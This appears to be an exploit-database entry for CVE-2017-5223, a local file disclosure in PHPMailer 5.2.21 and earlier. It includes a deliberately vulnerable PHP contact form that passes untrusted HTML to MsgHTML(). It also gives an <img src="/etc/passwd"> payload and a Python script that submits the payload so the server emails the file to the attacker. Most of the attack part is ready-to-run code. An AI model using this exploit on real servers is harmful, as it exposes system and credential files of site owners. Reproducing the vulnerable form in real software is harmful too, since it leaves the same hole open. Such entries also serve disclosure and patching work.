PHPMailer < 5.2.21 - Local File Disclosure

Related Vulnerabilities: CVE-2017-5223  
Publish Date: 25 Oct 2017
Author: Maciek Krupa

# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223

// PoC //

It requires a contact form that sends HTML e-mails and lets the sender request a copy of the message at their own address.

// vulnerable form example //

<?php
require_once('class.phpmailer.php'); // PHPMailer <= 5.2.21
if (isset($_POST['your-name'], $_POST['your-email'], $_POST['your-message'])) {
    $mail = new PHPMailer();
    $mail->SetFrom($_POST["your-email"], $_POST["your-name"]);
    $address = "admin@localhost";
    $mail->AddAddress($address, "root");
    if (isset($_POST['cc'])) $mail->AddCC($_POST["your-email"], $_POST["your-name"]); // copy goes back to the sender's address
    $mail->Subject = "PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)";
    $mail->MsgHTML($_POST["your-message"]); // untrusted HTML: MsgHTML() turns local <img src> paths into embedded attachments
    if(!$mail->Send()) echo "Error: ".$mail->ErrorInfo; else echo "Sent!";
}
?>
<form action="/contact.php" method="post">
<p><label>Your Name<br /><input type="text" name="your-name" value="" size="40" /></label></p>
<p><label>Your Email<br /><input type="email" name="your-email" value="" size="40" /></label></p>
<p><label>Your Message<br /><textarea name="your-message" cols="40" rows="10"></textarea></label></p>
<p><input type="checkbox" name="cc" value="yes" /><span>Send me a copy of this message</span></p>
<p><input type="submit" value="submit" /></p>
</form>

// exploit //

Put <img src="/etc/passwd"> in the message (or other file to disclose).

// python code //

#!/usr/bin/python
import urllib
import urllib2
 
poc = """
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223
"""
 
url = 'http://localhost/contact.php'
email = 'attacker@localhost'
payload = '<img src="/etc/passwd"'
values = {'action': 'send', 'your-name': 'Attacker', 'your-email': email, 'cc': 'yes', 'your-message': payload}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
html = response.read()
print html